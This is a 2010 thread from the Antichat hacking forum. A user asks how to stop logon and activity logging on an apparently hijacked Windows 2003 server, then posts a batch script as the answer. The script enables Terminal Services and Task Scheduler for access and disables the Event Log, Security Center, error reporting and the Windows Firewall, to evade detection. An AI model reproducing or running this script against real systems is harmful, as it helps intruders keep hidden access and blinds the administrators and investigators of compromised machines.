Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   отключение логирования (https://forum.antichat.xyz/showthread.php?t=197826)

SEWERN 20.04.2010 20:32
отключение логирования
 
Меня мучает один вопрос , как отключить логирование в win 2003 (входов на дед/действий) , способ чистки логов не подходит , интересует каким способом это можно выполнить ? Спасибо.

Redwood 25.04.2010 22:04
Дабы не создавать новую тему, апну эту, что никто не знает?

SEWERN 26.04.2010 21:29
Цитата:
Сообщение от Redwood
Дабы не создавать новую тему, апну эту, что никто не знает?
я знаю (помогли на грабере) . батник вида

PHP код:
REM сначала текоторые включаем в автомат
:: Fast User Switching Compatibility (Совместимость быстрого переключения пользователей
:: она позволит переключаться между пользователями без закрытия работающих программчто бывают очень удобно.
REG add HKLM\SYSTEM\CurrentControlSet\Services\FastUserSwi tchingCompatibility /v Start /t REG_DWORD /d 2 /f
:: Secondary Logon (Вторичный вход в систему)
REG add HKLM\SYSTEM\CurrentControlSet\Services\seclogon /v Start /t REG_DWORD /d 2 /f
:: Task Scheduler (Планировщик заданий)
REG add HKLM\SYSTEM\CurrentControlSet\Services\Scheduler /v Start /t REG_DWORD /d 2 /f
:: Terminal Services (Службы терминалов)
REG add HKLM\SYSTEM\CurrentControlSet\Services\TermService /v Start /t REG_DWORD /d 2 /f


REM а теперь течто отключаем
:: убиваем самое главое EventLogпараллельно EventSystem
REG add HKLM\SYSTEM\CurrentControlSet\Services\EventSystem /v Start /t REG_DWORD /d 4 /f
REG add HKLM\SYSTEM\CurrentControlSet\Services\Eventlog /v Start /t REG_DWORD /d 4 /f
:: убиваем Alerter (ОповещательПосылает выбранным пользователям и компьютерам административные оповещения.
REG add HKLM\SYSTEM\CurrentControlSet\Services\Alerter /v Start /t REG_DWORD /d 4 /f
:: Error Reporting Service (Служба регистрации ошибок)
REG add HKLM\SYSTEM\CurrentControlSet\Services\ERSvc /v Start /t REG_DWORD /d 4 /f
:: Security Center (Центр обеспечения безопасности)
REG add HKLM\SYSTEM\CurrentControlSet\Services\wscsvc /v Start /t REG_DWORD /d 4 /f
:: System Event Notification (Уведомление о системных событиях)
REG add HKLM\SYSTEM\CurrentControlSet\Services\SENS /v Start /t REG_DWORD /d 4 /f
:: Windows Firewall/Internet Connection Sharing (Брандмауэр Windows Общий доступ к Интернету (ICS))
REG add HKLM\SYSTEM\CurrentControlSet\Services\SharedAcces s /v Start /t REG_DWORD /d 4 /
рестарт дед после батника.


Время: 02:17